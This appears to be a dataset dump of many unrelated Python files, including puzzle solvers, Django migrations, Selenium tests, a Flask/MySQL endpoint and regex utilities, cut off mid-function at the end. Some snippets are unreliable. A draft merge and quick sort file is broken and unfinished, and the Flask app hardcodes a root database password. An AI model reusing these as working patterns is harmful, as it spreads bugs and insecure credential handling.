text stringlengths 8 6.05M |
|---|
import io
import requests
import zipfile
import shutil
import re
response = requests.get(f'http://www.pythonchallenge.com/pc/def/channel.zip')
zf = zipfile.ZipFile(io.BytesIO(response.content))
# print(zf.namelist())
comments = []
print(zf.open("readme.txt").readlines())
file_name = "90052.txt"
while True:
file_output = zf.read(file_name).decode('utf-8')
comments.append(zf.getinfo(file_name).comment.decode('utf-8'))
print(file_output)
text = re.search(r'Next nothing is (\d+)', file_output)
if text is None:
print('ERrro')
break
else:
file_name = f"{text.group(1)}.txt"
print(''.join(comments)) |
# mocking is a very common testing practice
# faking the output of a function with predefined values
# allows us to write test in a consistent fashion without worrying if an underlying works correctly
from unittest.mock import MagicMock
from daos.book_dao_postgres import BookDaoPostgres
from entities.book import Book
from services.book_service import BookService
# imgaine these are the only three books in my database
from services.book_service_impl import BookServiceImpl
books = [Book(0,'The Lion the Witch and the Wardrobe','doesnt matter',True,0,0),
Book(0,'War and Peace','doesnt matter',True,0,0),
Book(0,'Frankenstein','doesnt matter',True,0,0)]
# the book service cannot work unless the BookDAO also works correclty
mock_dao = BookDaoPostgres()
mock_dao.get_all_books = MagicMock(return_value = books)
books = mock_dao.get_all_books() # if you call this function that I magic mocked at line 21 return those defined 3 books
book_service: BookService = BookServiceImpl(mock_dao)
def test_get_by_title_1():
result = book_service.find_books_by_tile_containing("War")
assert len(result) == 2
|
def score(palabra):
totalPuntos = 0
acum = ''
valores = {
'A': 1, 'E': 1, 'I': 1, 'O': 1, 'U': 1,
'L': 1, 'N': 1, 'R': 1, 'S': 1, 'T': 1,
'D': 2, 'G': 2, 'B': 3, 'C': 3, 'M': 3, 'P': 3,
'F': 4, 'H': 4, 'V': 4, 'W': 4, 'Y': 4, 'K': 5,
'J': 8, 'X': 8, 'Q': 10, 'Z': 10
}
for i in palabra:
if i not in acum:
letra = palabra.count(i)
acum += i
totalPuntos += valores[i.upper()] * letra
return totalPuntos
|
class Planet():
def __init__(self, name, parent):
self.name = name
self.parent = parent
self.children = []
def totalOrbits(self):
if self.parent == None:
return 0
return 1 + self.parent.totalOrbits()
def main():
planetList = registerPlanets()
orbitCount = 0
for planet in planetList:
orbitCount += planet.totalOrbits()
print(orbitCount)
def registerPlanets():
inputOrbits = open("input_Day6.txt", "r")
planets = []
for orbit in inputOrbits:
bodyName, planetName = orbit.rstrip().split(")")
satelite = None
body = None
for p in planets:
if planetName == p.name:
satelite = p
if bodyName == p.name:
body = p
if satelite != None and body != None:
satelite.parent = body
body.children.append(satelite)
elif satelite != None and body == None:
body = Planet(bodyName, None)
body.children.append(satelite)
satelite.parent = body
planets.append(body)
elif satelite == None and body != None:
satelite = Planet(planetName, body)
body.children.append(satelite)
planets.append(satelite)
elif satelite == None and body == None:
body = Planet(bodyName, None)
satelite = Planet(planetName, body)
body.children.append(satelite)
planets.append(body)
planets.append(satelite)
inputOrbits.close()
return planets
main() |
# Generated by Django 3.2 on 2021-04-14 11:01
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('app', '0002_auto_20210414_1658'),
]
operations = [
migrations.AlterModelOptions(
name='role',
options={'ordering': ['name']},
),
]
|
import os.path
from sqlalchemy import create_engine
from sqlalchemy.orm import Session
from client.clientmodels import LocalUsers, LocalContacts, MessageHistory
class ClientDatabase:
def __init__(self, path, name):
db_path = os.path.join(path, f"client_{name}.db3")
engine = create_engine(f'sqlite:///{db_path}', echo=False, pool_recycle=7200,
connect_args={'check_same_thread': False})
LocalUsers.__table__.create(engine, checkfirst=True)
LocalContacts.__table__.create(engine, checkfirst=True)
MessageHistory.__table__.create(engine, checkfirst=True)
self.local_users = LocalUsers
self.local_contacts = LocalContacts
self.message_history = MessageHistory
self.session = Session(engine)
self.session.commit()
def get_users(self):
users = self.session.query(self.local_users.name).all()
return [user[0] for user in users]
def get_contacts(self):
contacts = self.session.query(self.local_contacts.contact_name).all()
return [contact[0] for contact in contacts]
def is_contact_exist(self, name):
if self.session.query(self.local_contacts).filter_by(contact_name=name).count():
return True
else:
return False
def remove_contact(self, name):
self.session.query(self.local_contacts).filter_by(contact_name=name).delete()
def is_user_exists(self, name):
if self.session.query(self.local_users).filter_by(name=name).count():
return True
else:
return False
def add_contact(self, name):
if not self.session.query(self.local_contacts).filter_by(contact_name=name).count():
contact_row = self.local_contacts(name)
self.session.add(contact_row)
self.session.commit()
def add_users(self, users_list):
self.session.query(self.local_users).delete()
for name in users_list:
user_row = self.local_users(name)
self.session.add(user_row)
self.session.commit()
def save_message(self, contact_name, direction, message):
message_row = self.message_history(contact_name, direction, message)
self.session.add(message_row)
self.session.commit()
def get_history(self, contact_name):
query = self.session.query(self.message_history).filter_by(contact_name=contact_name)
history_list = [(item.contact_name, item.direction, item.message, item.date) for item in query.all()]
return history_list
def check_contact(self, contact_name):
if self.session.query(self.local_contacts).filter_by(contact_name=contact_name).count():
return True
else:
return False
def clear_contacts(self):
self.session.query(self.local_contacts).delete()
|
def info(**nos):
print str(type(nos))
print nos
info(a=1, b=2, c=3)
|
import numpy as np
def relu(X, deriv=False):
if not deriv:
return np.max(X, 0)
else:
return X > 0
def sigmoid(X, deriv=False):
if not deriv:
return 1/(1+np.exp(-X))
else:
s = sigmoid(X)
return s*(1-s)
def tanh(X, deriv=False):
if not deriv:
exp = np.exp(X)
inv_exp = 1/exp
return (exp-inv_exp)/(exp+inv_exp)
else:
t = tanh(X)
return 1-t**2
def softmax(X, deriv=False):
if not deriv:
exp = np.exp(X)
sum_exp = np.sum(exp, axis=0, keepdims=True)
return exp/sum_exp
else:
raise NotImplementedError
def get_activation(name):
return {'relu': relu,
'sigmoid': sigmoid,
'tanh': tanh}[name]
|
"""
Time/Space complexity = O(N)
"""
# Top Down Approach
from functools import lru_cache
class Solution:
def rob(self, nums: List[int]) -> int:
if not nums:
return 0
@lru_cache(maxsize=None)
def dfs(val = 0, indx = 0):
if indx >= len(nums):
return val
left, right = indx + 2, indx + 3
return max(dfs(val + nums[indx], left), dfs(val + nums[indx], right))
return max(dfs(0,0), dfs(0,1))
# Bottom UP
from functools import lru_cache
class Solution:
def rob(self, nums: List[int]) -> int:
if not nums:
return 0
hr = [0]*len(nums)
for i, v in enumerate(nums):
hr[i] = max((hr[i-2] if i - 2 >= 0 else 0) + v, hr[i-1] if i - 1 >= 0 else 0)
return hr[-1]
|
import MapReduce
import sys
"""
Join input from two tables
"""
mr = MapReduce.MapReduce()
# =============================
# Do not modify above this line
def mapper(record):
# 0: table name
# 1: order id
# 2+: data
mr.emit_intermediate(record[1], record)
def reducer(key, list_of_values):
list_of_values.sort()
order = list_of_values.pop(-1)
for line_item in list_of_values:
mr.emit(order + line_item)
# Do not modify below this line
# =============================
if __name__ == '__main__':
inputdata = open(sys.argv[1])
mr.execute(inputdata, mapper, reducer)
|
# Generated by Django 2.2.5 on 2019-10-12 04:26
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('gestiondeusuarios', '0004_auto_20191010_1255'),
]
operations = [
migrations.RemoveField(
model_name='numid',
name='Doctores',
),
migrations.RemoveField(
model_name='numid',
name='Nutriologos',
),
migrations.RemoveField(
model_name='numid',
name='Usuarios',
),
migrations.DeleteModel(
name='Doctores',
),
migrations.DeleteModel(
name='NumID',
),
migrations.DeleteModel(
name='Nutriologos',
),
migrations.DeleteModel(
name='Usuarios',
),
]
|
from selenium import webdriver
import time
def checkWelcome():
url = 'https://opensource-demo.orangehrmlive.com/index.php/auth/login'
location = '../drivers/'
driver = webdriver.Chrome(executable_path=location + 'chromedriver.exe')
driver.get(url)
time.sleep(2)
driver.find_element_by_name('txtUsername').send_keys('Admin')
driver.find_element_by_name('txtPassword').send_keys('admin123')
driver.find_element_by_name('Submit').click()
welcomeText = driver.find_element_by_id('welcome').text
print(welcomeText)
assert "Welcome" in welcomeText
driver.find_element_by_id("welcome").click()
driver.find_element_by_link_text("Logout").click()
# checkWelcome()
|
#!python
def merge(list1, list2):
"""Merge given lists of items, each assumed to already be in sorted order,
and return a new list containing all items in sorted order.
TODO: Running time: ??? Why and under what conditions?
TODO: Memory usage: ??? Why and under what conditions?"""
# TODO: Repeat until one list is empty
# TODO: Find minimum item in both lists and append it to new list
# TODO: Append remaining items in non-empty list to new list
###############################################################
### Logic: You already have lists that are already sorted, you want to
### mix them and keep them in order
'''
Approach1: Given that you don't need to organize the given lists, step
ignored. You compare each list first item with the other list
first item and append the lower value to the new list until
there is none
'''
### Process: 1. Create new list that will hold the merged values
### 2. Make position variables for each list
### 3. If list1 has a lower value add it to the new_list
### increase corresponding position variable
### 4. if not then it means that list2 has a lower value
### so add that instead to the new_list and increase
### corresponding position variable
### 5. If neither is lower than the other then they must
### be equal, so append both.
new_list = list()
list1_current_position = 0
list2_current_position = 0
if list1[list1_current_position] < list2[list2_current_position]:
new_list.append(list1[list1_current_position])
list1_current_position += 1
elif list2[list2_current_position] < list1[list1_current_position]:
new_list.append(list2[list2_current_position])
list2_current_position += 1
else:
new_list.append(list1[list1_current_position])
list1_current_position += 1
new_list.append(list2[list2_current_position])
list2_current_position += 1
return new_list
'''
Approach2: This time forget positional values and to save space delete
'''
### Process: 1. Make a new list
### 2. if the first item (python lists start at index 0) of list 1
### at the first index is lower than the first index of list 2.
### Append the item been taken out of the list 1 to the new list
### 3. if the first item of list 2 at the first index is lower than
### the first index of list 1.
### Append the item been taken out of the list 1 to the new list.
### 4. if anything in list1.
### if something still in list2
### Append the item at index 0 been taken out of the list 2 to the
### new list.
### elif anything in list2 too
### return the new list
### 5. if anything in list2.
### if something still in list1
### Append the item at index 0 been taken out of the list 1 to the
### new list.
### elif anything in list1 too
### return the new list
### 6. else this means both items are the same append to the new list.
### Append the first item from list1 and list2 to the new list, after
### getting them out
new_list = list()
if list1[0] < list2[0]:
new_list.append(list1.pop(0))
elif list2[list2_current_position] < list1[list1_current_position]:
new_list.append(list2.pop(0))
elif not list1:
if list2:
new_list.append(list2.pop(0))
elif not list2:
return new_list
elif not list2:
if list1:
new_list.append(list1.pop(0))
elif not list1:
return new_list
else:
new_list.append(list1.pop(0))
new_list.append(list2.pop(0))
# If I don't return the list does the if loop keeps on going until it return
# the new list given that both lists are empty
# return new_list
def split_sort_merge(unsplit_list):
"""Sort given items by splitting list into two approximately equal halves,
sorting each with an iterative sorting algorithm, and merging results into
a list in sorted order.
TODO: Running time: ??? Why and under what conditions?
TODO: Memory usage: ??? Why and under what conditions?"""
# TODO: Split items list into approximately equal halves
# TODO: Sort each half using any other sorting algorithm
# TODO: Merge sorted halves into one list in sorted order
###############################################################
### Logic: I have items in a unarranged list, I want to divide and conquer
### or better said divide and merge, I will be separating the
### totality of the list into smaller fragments that are easier to sort
'''
Approach1: Get the totality of items and divide the list in two new lists,
then sort those sublists and merge those lists
'''
### Process: 1. Get the lenght of the list
### 2. Create the new lists
### 3. Set a position holder
### 4. While index is lower or equal to half the lenght of the given list.
### Add the corresponding index value to the splitted list 1.
### Increase by one the value of the position holder so by the end you
### get the splitted list 1 with half the value of the original list.
### 5. Given that index kept on increasing until half the list, now it goes
### while it is one value lower than the lenght of the unsplit list.
### Add the value on position of the current index to splitted list 2.
### Increase the value plus 1 in the index
splitted_list1 = list()
splitted_list2 = list()
lenght_unsplit_list = len(unsplit_list)
index = 0
while index <= int(lenght_unsplit_list/2):
splitted_list1.append(unsplit_list[index])
index =+ 1
print(index)
while index < lenght_unsplit_list:
splitted_list2.append(unsplit_list[index])
index =+ 1
# Sort each list
# Sum them up
def merge_sort(items):
"""Sort given items by splitting list into two approximately equal halves,
sorting each recursively, and merging results into a list in sorted order.
TODO: Running time: ??? Why and under what conditions?
TODO: Memory usage: ??? Why and under what conditions?"""
# TODO: Check if list is so small it's already sorted (base case)
# TODO: Split items list into approximately equal halves
# TODO: Sort each half by recursively calling merge sort
# TODO: Merge sorted halves into one list in sorted order
###############################################################
### Logic:
'''
Approach1:
'''
### Process: 1.
lenght_unsplit_list = len(unsplit_list)
splitted_list1 = list()
splitted_list2 = list()
index = 0
while index <= int(lenght_unsplit_list/2):
splitted_list1.append(unsplit_list[index])
index =+ 1
print(index)
while index < lenght_unsplit_list:
splitted_list2.append(unsplit_list[index])
index =+ 1
###############################################################
##### What is partition?: It is separating something in smaller groups
#####
def partition(items, low, high):
"""Return index `p` after in-place partitioning given items in range
`[low...high]` by choosing a pivot (TODO: document your method here) from
that range, moving pivot into index `p`, items less than pivot into range
`[low...p-1]`, and items greater than pivot into range `[p+1...high]`.
TODO: Running time: ??? Why and under what conditions?
TODO: Memory usage: ??? Why and under what conditions?"""
# TODO: Choose a pivot any way and document your method in docstring above
# TODO: Loop through all items in range [low...high]
# TODO: Move items less than pivot into front of range [low...p-1]
# TODO: Move items greater than pivot into back of range [p+1...high]
# TODO: Move pivot item into final position [p] and return index p
###############################################################
### Logic: To do the quicksort we can be modular by making the partitioning
### part be outside the scope of the main function and do it's part
### apart. This is done because it is a key component of quicksort.
'''
Approach1: First you select a pivot at random
'''
### Process: 1.
pivot = len(items)/2
def quick_sort(unsorted_list, low=None, high=None):
"""Sort given items in place by partitioning items in range `[low...high]`
around a pivot item and recursively sorting each remaining sublist range.
TODO: Best case running time: ??? Why and under what conditions?
TODO: Worst case running time: ??? Why and under what conditions?
TODO: Memory usage: ??? Why and under what conditions?"""
# TODO: Check if high and low range bounds have default values (not given)
# TODO: Check if list or range is so small it's already sorted (base case)
# TODO: Partition items in-place around a pivot and get index of pivot
# TODO: Sort each sublist range by recursively calling quick sort
###############################################################
### Logic: All your items in the list are a mess and it's not useful at all!
### Chaos is all over the place, you want it to be done fast so you do
### quicksort because like the name implies it must be fast.
'''
Approach1: Create all the necessary variables before the while loop
'''
### Process: 1.
# mientras que la lista sin mesclar este
#while unsorted_list
pivot = 0
# while pivot is less than unsorted list, pivot won't be that because len gives you
# + 1 of the current value
if low is None:
low = 0
while pivot < len(unsorted_list):
low = unsorted_list[0]
for items in unsorted_list:
#
#
|
import os
import sys
from functools import partial
import pymel.core as pm
import maya.cmds as cmds
import maya.mel as mel
def findAllFiles(fileDirectory, fileExtension):
# Return a list of all file names, excluding the file extension
allFiles = os.listdir(fileDirectory)
# Refine all files, listing only those of the specified file extension
returnFiles = []
for f in allFiles:
splitString = str(f).rpartition(fileExtension)
if not splitString[1] == "" and splitString[2] == "":
returnFiles.append(splitString[0])
return returnFiles |
for x in range(100, 1, -2):
print(x) |
'''
Regular Expression Library used by Shorthand.
'''
# General
# Matches a valid Date Stamp
DATE_STAMP_PATTERN = r'[1-2][0-9]{3}\-[0-3][0-9]\-[0-3][0-9]'
# Matches a valid Date Stamp within parentheses
START_STAMP_PATTERN = r'\(' + DATE_STAMP_PATTERN + r'\)'
# Matches two valid Date Stamps within parentheses with an arrow between
END_STAMP_PATTERN = r'\(' + DATE_STAMP_PATTERN + r' -> ' + \
DATE_STAMP_PATTERN + r'\)'
# To-Dos
# Matches all valid prefixes for incomplete, complete, or skipped todos
CATCH_ALL_PATTERN = r'(^\s*)([-+*] )(\[[XS ]?\])( [a-zA-Z1-9\(\)])'
# Matches all incomplete todos with valid timestamps
VALID_INCOMPLETE_PATTERN = r'[-+*] \[ \] ' + START_STAMP_PATTERN
# Matches all completed or skipped todos with valid start and end timestamps
VALID_COMPLETE_PATTERN = r'[-+*] \[[XS]\] ' + END_STAMP_PATTERN
# Matches incomplete todos without a valid start timestamp
UNFINISHED_UNSTAMPED_PATTERN = r'(^\s*)([-+*] )(\[ ?\]) (?!' + \
START_STAMP_PATTERN + r')'
# Matches completed or skipped todos with only the start timestamp
FINISHED_START_STAMPED_PATTERN = r'(^\s*)([-+*] )(\[)([XS])(\] )(\()(' + \
DATE_STAMP_PATTERN + r')(\)) '
# Matches completed or skipped todos with no valid timestamp
FINISHED_UNSTAMPED_PATTERN = r'(^\s*)([-+*] )(\[)([XS])(\] )(?!(' + \
START_STAMP_PATTERN + r'|' + \
END_STAMP_PATTERN + r'))'
# Matches the prefix of a skipped todo
SKIPPED_PREFIX_GREP = r'(^\s*)([-+*] )(\[S\])( [a-zA-Z1-9\(\)])'
# Matches the prefix of an incomplete todo
INCOMPLETE_PREFIX_GREP = r'(^\s*)([-+*] )(\[ ?\])( [a-zA-Z1-9\(\)])'
# Matches the prefix of a complete todo
COMPLETE_PREFIX_GREP = r'(^\s*)([-+*] )(\[X\])( [a-zA-Z1-9\(\)])'
# Matches a start stamp and todo without the prefix
START_STAMP_ONLY_PATTERN = r'(\()(' + DATE_STAMP_PATTERN + r')(\))( )(.*)'
# Matches an end stamp and todo without the prefix
START_END_STAMP_ONLY_PATTERN = r'(\()(' + DATE_STAMP_PATTERN + r')( -> )(' + \
DATE_STAMP_PATTERN + r')(\))( )(.*)'
# Questions & Answers
# Matches either a question or answer
QUESTION_OR_ANSWER = r'(^\s*)([-+*] )([\?@] )(.*)'
# Matches a question
ALL_QUESTIONS = r'(^\s*)([-+*] )(\? )(.*)'
UNSTAMPED_QUESTION = r'(^\s*)([-+*] )(\? )(?!' + START_STAMP_PATTERN + r' )'
STAMPED_QUESTION = r'\? ' + START_STAMP_PATTERN + r' '
# Matches an answer
ANSWER_PATTERN = r'(^\s*)([-+*] )(@ )(.*)'
UNSTAMPED_ANSWER = r'(^\s*)([-+*] )(@ )(?!' + START_STAMP_PATTERN + r' )'
STAMPED_ANSWER = r'(@ )(\()' + DATE_STAMP_PATTERN + r'(\)) '
# Matches a today placeholder
TODAY_GREP = r'"\\\today"'
TODAY_LINE_PATTERN = r'(.*)(\\today)(.*)'
# Matches a tag
TAG_FILTER = r'( :\w+:)'
TAG_PATTERN = r'( :\w+:)($|(?= ))'
# Matches a definition
DEFINITION_PATTERN = r"^(\s*)([-+*] )(\{[\-_+&*:()/\\p{L}' \w]*?\} )(.*)"
# Matches any heading
HEADING_PATTERN = r'^(#+)( )(.*)'
# Matches any heading which ends with a datestamp
DATED_HEADING_PATTERN = r'^(#+)( )(.*)(' + DATE_STAMP_PATTERN + r')'
# Matches the beginning of a record set
RECORD_SET_PATTERN = r'^```rec-data$'
# Matches any link
LINK_PATTERN = r'\s\[.*?\]\(.*?\)'
ALL_LINK_PATTERN = r'\s(\[[^\[]*?\]\()(.*?)(\))'
# Matches a link to another note
INTERNAL_LINK_PATTERN = r'(\s)(\[[^\[]*?\]\()((?!(https://|http://)).*?)(\))'
# Matches any Image
IMAGE_PATTERN = r'!\[(.*?)\]\((.*?)\)'
# Matches a GPS location
GPS_PATTERN = r"(GPS\[)(-?1?\d{1,2}\.\d{3,6})(, ?)"\
r"(-?1?\d{1,2}\.\d{3,6})(, ?)?([\w ]+)?(\])"
CHARS_TO_ESCAPE = ['`']
def escape_for_cli(input_pattern):
'''Patterns which include special characters must
be escaped before being used on the command line
'''
clean_pattern = ''
while input_pattern:
next_char = input_pattern[0]
if next_char in CHARS_TO_ESCAPE:
clean_pattern += '\\' + next_char
input_pattern = input_pattern[1:]
else:
clean_pattern += next_char
input_pattern = input_pattern[1:]
return clean_pattern
|
n=int(input('Enter the no. of lines'))
for i in range(0,n):
for a in range(0,i):
print(' ',end=" ")
for j in range(i,n):
print("*",end=" ")
print('')
|
from flask import Flask
from flask import Blueprint
from flask import request
from flask import jsonify
from flaskext.mysql import MySQL
from flask_cors import CORS, cross_origin
app= Flask(__name__)
mysql=MySQL()
app.config['MYSQL_DATABASE_USER'] ='root'
app.config['MYSQL_DATABASE_PASSWORD'] ='admi'
app.config['MYSQL_DATABASE_DB'] ='proyecto'
app.config['MYSQL_DATABASE_HOST'] ='127.0.0.1'
mysql.init_app(app)
conn =mysql.connect()
cursor=conn.cursor()
#Cambio
facultad_blueprint = Blueprint('facultad_blueprint', __name__)
#CAMBIAR(2)
@facultad_blueprint.route('/create_facultad',methods=['POST'])
def create_facultad():
print(request.json)
params={
'idfacultad':request.json['idfacultad'],
'nombre': request.json['nombre'],
'escuela_idescuela':request.json['escuela_idescuela'],
}
#cambiar para cada tabla
query="""insert into facultad (idfacultad, nombre,escuela_idescuela)
values (%(idfacultad)s, %(nombre)s,%(escuela_idescuela)s)"""
cursor.execute(query,params)
conn.commit()
content={'idfacultad':params['idfacultad'],
'nombre':params['nombre'],
'escuela_idescuela':params['escuela_idescuela']}
return jsonify(content) |
# In[1]:
import pandas as pd
# In[3]:
df_brazil = pd.read_csv("sudeste.csv", usecols=["date", "temp"])
# In[5]:
df_madrid = pd.read_csv("weather_madrid_LEMD_1997_2015.csv", usecols=["CET", "Mean TemperatureC"])
# In[12]:
df_brazil_no_dup_date = df_brazil.groupby("date").mean().reset_index()
# In[14]:
df_final = pd.merge(df_brazil_no_dup_date, df_madrid, how="inner", left_on="date", right_on="CET")
# In[17]:
df_final = df_final[["date", "temp", "Mean TemperatureC"]]
# In[19]:
df_final.columns = ["date", "temp_brazil", "temp_madrid"]
# In[21]:
df_final[["temp_brazil", "temp_madrid"]].corr()
# In[22]:
# Brazil and Madrid average daily temperatures have a negative correlation of -0.03 but that can be ignored.
# As a result one can say Brazil and Madrid average daily temperatures are independent of each other.
|
"""
Copyright Matt DeMartino (Stravajiaxen)
Licensed under MIT License -- do whatever you want with this, just don't sue me!
This code attempts to solve Project Euler (projecteuler.net) Problem #15 Lattice paths
Starting in the top left corner of a 2x2 grid, and only being able to move to the
right and down, there are exactly 6 routes to the bottom right corner.
How many such routes are there through a 20x20 grid?
"""
import time
def main():
solns = {(i, j): None for i in range(1, 21) for j in range(1, 21)}
for i in range(1, 21):
solns[(i, 1)] = i+1
solns[(1, i)] = i+1
def solns_for(i, j):
if solns[(i, j)] is not None:
return solns[i, j]
else:
if i == 1:
solns[i, j] = j+1
return solns[i, j]
if j == 1:
solns[i, j] = i+1
return solns[i, j]
else:
solns[i, j] = solns_for(i-1, j) + solns_for(i, j-1)
return solns[i,j]
print(solns_for(20, 20))
if __name__ == "__main__":
start_time = time.time()
main()
elapsed_time = time.time() - start_time
print("Elapsed Time: ", elapsed_time)
|
#!/usr/bin/env python
import subprocess
import sys
import os
def main():
# print os.getcwd()
if len(sys.argv) is 1:
wd = '.'
elif len(sys.argv) is 2:
wd = sys.argv[1]
else:
raise ValueError
count = 0
for root, dirs, files in os.walk(wd):
for file in files:
path = os.path.join(root, file)
if file.endswith('.pyc'):
# print 'removing', path
os.remove(path)
count += 1
if 'build_setup_py' in root and file.endswith('.py'):
# print 'removing', path
os.remove(path)
count += 1
print('removed', count, '.pyc and build/*.py files')
if __name__ == '__main__':
main()
|
from django.apps import AppConfig
class HappyTeamConfig(AppConfig):
name = 'happy_team'
|
print"Hello Github!"
|
import sqlite3
conn = sqlite3.connect('wordCount.db')
cursor = conn.cursor()
print("Connected")
sql = '''select * from wordCount'''
results = cursor.execute(sql)
all_words = results.fetchall()
for word in all_words:
print(word) |
from selenium import webdriver
from unittest import TestCase, main
from pyvirtualdisplay import Display
class TestClass(TestCase):
display = Display(visible=0, size=(800, 600))
display.start()
browser = webdriver.Firefox()
def test_0(self):
self.browser.get("https://congressand.me")
self.assertEqual(self.browser.title, "Congress and Me")
def test_1(self):
self.browser.get("https://congressand.me/representatives/page/1")
self.browser.implicitly_wait(3)
home_page = self.browser.find_element_by_class_name("page-title")
self.assertEqual(home_page.text, "Representatives")
def test_2(self):
self.browser.get("https://congressand.me/states/page/1")
self.browser.implicitly_wait(3)
home_page = self.browser.find_element_by_class_name("page-title")
self.assertEqual(home_page.text, "States")
def test_3(self):
self.browser.get("https://congressand.me/issues/page/1")
self.browser.implicitly_wait(3)
home_page = self.browser.find_element_by_class_name("page-title")
self.assertEqual(home_page.text, "Issues")
def test_4(self):
self.browser.get("https://congressand.me/about")
self.assertEqual(self.browser.title, "Congress and Me")
def test_5(self):
self.browser.get("https://congressand.me/representatives/page/1")
self.browser.implicitly_wait(3)
home_page = self.browser.find_element_by_class_name("navbar-brand")
self.assertEqual(home_page.text, "Congress and Me")
def test_6(self):
self.browser.get("https://congressand.me/states/page/1")
self.browser.implicitly_wait(3)
home_page = self.browser.find_element_by_class_name("navbar-brand")
self.assertEqual(home_page.text, "Congress and Me")
def test_7(self):
self.browser.get("https://congressand.me/issues/page/1")
self.browser.implicitly_wait(3)
home_page = self.browser.find_element_by_class_name("navbar-brand")
self.assertEqual(home_page.text, "Congress and Me")
def test_8(self):
self.browser.get("https://congressand.me/")
self.browser.implicitly_wait(3)
home_page = self.browser.find_element_by_class_name("navbar-brand")
self.assertEqual(home_page.text, "Congress and Me")
def test_9(self):
self.browser.get("https://congressand.me/about")
self.browser.implicitly_wait(3)
home_page = self.browser.find_element_by_xpath("/html/body/div/nav/a")
self.assertEqual(home_page.text, "")
def test_10(self):
self.browser.get("https://congressand.me/")
self.browser.implicitly_wait(3)
home_page = self.browser.find_element_by_class_name("text-justify")
self.assertEqual(
home_page.text,
"The six of us believe that a well-informed populace is crucial to a functioning democracy. We wanted a way for people to easily see what issues their representatives are and aren’t talking about in their tweets and on the Congress floor, and we wanted to highlight which issues are being discussed and which ones require attention on a nation-wide scale. To that end, we’ve built Congress and Me.",
)
def test_11(self):
self.browser.get("https://congressand.me/")
self.browser.implicitly_wait(3)
home_page = self.browser.find_element_by_xpath(
"/html/body/div/div/main/div[1]/div/div[2]/p"
)
self.assertEqual(
home_page.text,
'"The ballot is stronger than the bullet." - Abraham Lincoln',
)
def test_12(self):
self.browser.get("https://congressand.me/representatives/page/1")
self.browser.implicitly_wait(3)
home_page = self.browser.find_element_by_xpath(
"/html/body/div/div/main/div[1]/div[1]/div[2]/p"
)
self.assertEqual(home_page.text, "Learn who represents your State!")
def test_13(self):
self.browser.get("https://congressand.me/states/page/1")
self.browser.implicitly_wait(3)
home_page = self.browser.find_element_by_xpath(
"/html/body/div/div/main/div[1]/div[1]/div[2]/p"
)
self.assertEqual(home_page.text, "Learn more about your State!")
def test_14(self):
self.browser.get("https://congressand.me/issues/page/1")
self.browser.implicitly_wait(3)
home_page = self.browser.find_element_by_xpath(
"/html/body/div/div/main/div[1]/div[2]/p"
)
self.assertEqual(home_page.text, "All the hottest topics being discussed")
def test_15(self):
self.browser.get("https://congressand.me/about")
self.browser.implicitly_wait(3)
home_page = self.browser.find_element_by_class_name("jumbotron-heading")
self.assertEqual(
home_page.text, "",
)
def test_16(self):
self.browser.get("https://congressand.me/visualizations")
self.browser.implicitly_wait(3)
home_page = self.browser.find_element_by_xpath(
"/html/body/div/div/main/section/div/p"
)
self.assertEqual(
home_page.text, "A picture is worth a thousand lines of code.",
)
def test_17(self):
self.browser.get("https://congressand.me/visualizations")
self.browser.implicitly_wait(3)
home_page = self.browser.find_element_by_class_name("jumbotron-heading")
self.assertEqual(
home_page.text, "Visualizations",
)
def test_18(self):
self.browser.get("https://congressand.me/visualizations")
self.browser.implicitly_wait(3)
home_page = self.browser.find_element_by_class_name("navbar-brand")
self.assertEqual(home_page.text, "Congress and Me")
if __name__ == "__main__":
main()
browser.quit()
display.stop()
|
#append list to second list
l1=list()
l2=list()
for i in range(5):
l1.append((input("enter element:")))
for i in range(5):
l2.append((input("enter element:")))
print(l1)
print(l2)
for i in range(5):
l1.append(l2[i])
print(l1)
|
import os
import random
from game import node, info
from cfr import cfr_player
from human import human_player
C0 = 2
player = cfr_player()
player.train(60 * 60 * 4 * 60)
player.output("test.QAQ") |
#/usr/bin/env python
# Author:tjy
# -*- utf-8 -*-
name = "tjy"
name2 = name
print("my name is", name, name2)
name = "paochege"
print(name, name2)
PI = 3.1415926
print(PI)
print("您好") |
#!/bin/python
import math
import os
import random
import re
import sys
# Complete the balancedForest function below.
class Tree:
def __init__(self, key, data):
self.data = data
self.children = {}
self.parent = None
self.key = key
def addChild(self, key, node):
self.children[key] = node
self.data += node.data
selfP = self.parent
while selfP != None:
selfP.data += node.data
selfP = selfP.parent
node.parent = self
def removeChild(self, node):
if self.children.get(node.key):
del self.children[node.key]
self.data -= node.data
selfP = self.parent
while selfP != None:
selfP.data -= node.data
selfP = selfP.parent
def addParent(self, node):
if self.parent == None:
node.children[self.key] = self
node.data += self.data
self.parent = node
def printTree(self):
q = []
q.append(self)
while len(q) > 0:
n = q.pop()
print("(%d, %d)" % (0 if n.parent == None else n.parent.key, n.key))
for v in n.children.values():
q.append(v)
def printWeights(self):
q = []
q.append(self)
while len(q) > 0:
n = q.pop()
print("(%d, %d)" %(n.key, n.data))
for v in n.children.values():
q.append(v)
def getRootNode(self):
t = self
while t.parent != None:
t = t.parent
return t
def balancedForest(c, edges):
#print(c)
#print(edges)
total = sum(c)
weights = []
treeNodes = {}
def getParentChield(e):
if treeNodes[e[0]].parent == treeNodes[e[1]]:
return treeNodes[e[1]], treeNodes[e[0]]
else:
return treeNodes[e[0]], treeNodes[e[1]]
for i in range(1, len(c)+1):
node = Tree(i, c[i-1])
treeNodes[i] = node
#root = treeNodes[4]
'''
for e in edges:
if e[0] > e[1]:
e[0],e[1] = e[1],e[0]
'''
unique = []
flatten = [item for sublist in edges for item in sublist]
tedges = edges[:]
while len(tedges) > 0:
for i in range(1, len(c)+1):
if flatten.count(i) == 1:
unique.append(i)
#flatten.remove(i)
while len(unique) > 0:
tu = unique.pop()
#print(tu)
td = None
for e in tedges:
if tu in e:
#print((e[0]+e[1]-tu))
treeNodes[tu].addParent(treeNodes[(e[0]+e[1]-tu)])
td = e
break
if td: tedges.remove(td)
flatten = [item for sublist in tedges for item in sublist]
#tedges = edges.copy()
'''
for i in range(1, len(c)+1):
for e in edges:
if i == e[0]:
print("edges:",e, i, treeNodes[e[1]].data)
treeNodes[i].addChild(e[1], treeNodes[e[1]])
'''
root = treeNodes[1].getRootNode()
#root.printTree()
#print("---")
#root.printWeights()
ans = total
el = len(edges)
for i in range(el):
e = edges[i]
#print("edges:",e)
#tw = treeNodes[e[0]].data - treeNodes[e[1]].data
tParent, tChild = getParentChield(e)
tCmpNode = None
